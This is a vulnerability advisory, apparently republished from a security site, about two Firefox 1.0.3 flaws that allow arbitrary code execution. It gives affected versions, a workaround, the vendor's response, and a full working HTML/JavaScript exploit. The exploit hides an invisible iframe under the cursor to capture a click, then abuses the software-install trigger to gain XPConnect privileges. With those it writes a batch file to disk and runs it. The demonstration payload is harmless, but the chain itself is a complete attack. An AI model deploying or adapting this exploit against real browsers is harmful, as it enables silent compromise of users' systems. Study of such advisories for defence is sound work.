‘Mozilla Firefox Arbitrary Code Execution (Exploit)’

Summary

‘Mozilla Firefox (originally known as Phoenix and briefly as Mozilla Firebird) is ‘a free, cross-platform, graphical web browser developed by the Mozilla Foundation and hundreds of volunteers’.

Two vulnerabilities have been discovered in Firefox, which can be exploited by malicious people to run malicious code on vulnerable systems and compromise its integrity.’

Credit:

‘The information has been provided by tuytumadre@att.net.
The original article can be found at: http://greyhatsecurity.org/vulntests/ffrc.htm


Details

Vulnerable Systems:
 * Mozilla Firefox version 1.0.3

This proof of concept involve exploiting two flaws:
1) Tricking Firefox into thinking a software installation is being triggered by a whitelisted site, using history stored trusted URL.
2) Software installation trigger not sufficiently checking image URLs containing JavaScript code.

Workaround:
Disable software installation (Web Features panel of the Options/Preferences window in Firefox 1.0.3 or the Content panel in the latest trunk builds).

Vendor Status:
The Mozilla Foundation patched (partially) this issue on the server side by adding random letters and numbers to the install function, which will prevent this exploit from working. We anticipate that the Mozilla Foundation will release a Firefox 1.0.4 update shortly.

Exploit:
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’>
< html>
< head>
< title>Firefox Full Remote Compromise</title>
</head>
< body>
Click anywhere inside this page to compromise your system!<br>
Don’t worry. Only a harmless batch file will be run. View the source if you dont believe me ;)<br>
Like I said in my Internet Explorer Auto-SP2 RC analysis, nothing is perfect. Breaking something, or if you’re the hacker, building something, only requires patience and a little bit of spare time.<br> <br>
Greetz to Mikx, Michael Evanchik, and the entire Mozilla team. This is a very nice browser you guys have put together!

< iframe onload=’loader()’ src=’javascript:'< noscript>’+eval(‘if (window.name!=\’stealcookies\’)
{ window.name=\’stealcookies\’; } else { event=
{ target:{ href: \’http://ftp.mozilla.org/pub/mozilla.org/extensions/flashgot/flashgot-0.5.9.1-fx+mz+tb.xpi\’} };
install(event, \’You are vulnerable!!!\’,\’javascript:eval(\\’netscape.security.PrivilegeManager.
enablePrivilege(\\\\’UniversalXPConnect\\\\’); file = Components.classes
[\\\\’@mozilla.org/file/local;1\\\\’].createInstance(Components.interfaces.nsILocalFile);
file.initWithPath(\\\\’c:\\\\\\\\booom.bat\\\\’);
file.createUnique(Components.interfaces.nsIFile.NORMAL_FILE_TYPE,420);
outputStream = Components.classes[\\\\’@mozilla.org/network/file-output-stream;1\\\\’].
createInstance( Components.interfaces.nsIFileOutputStream );
outputStream.init(file,0x04|0x08|0x20,420,0); output=\\\\’@ECHO off\\\\ncls\\\\n
ECHO If I wasnt so nice, this could have been a virus… \\\\nPAUSE\\\\’;
outputStream.write(output,output.length); outputStream.close(); file.launch();\\’)\’); }’) + ‘</noscript>< a href=\’https://addons.update.mozilla.org/extensions/moreinfo.php?id=220&
application=firefox\’ style=\’cursor:default;\’>   </’+’a>”
id=’targetframe’ scrolling=’no’ frameborder=’0′ marginwidth=’0′ marginheight=0′
style=’position:absolute; left:0px; width:0px;height:6px; width:6px; margin:0px;
padding:0px; -moz-opacity:0’></iframe>

< script language=’JavaScript’ type=’text/javascript’>

document.onmousemove = function trackMouse(e) {
    document.getElementById(‘targetframe’).style.left = (e.pageX-3)+’px’
    document.getElementById(‘targetframe’).style.top = (e.pageY-3)+’px’
}

var counter = 0;
function loader() {
    counter++
    if(counter == 1) {
        stealcookies.focus()
    } else if(counter == 2) {
        stealcookies.history.go(-1)
        //targetframe.style.display=’none’;
    }
}
</script>
</body>
</html>

Bugzilla:
https://bugzilla.mozilla.org/show_bug.cgi?id=292691 (limited access)’

Categories: Exploits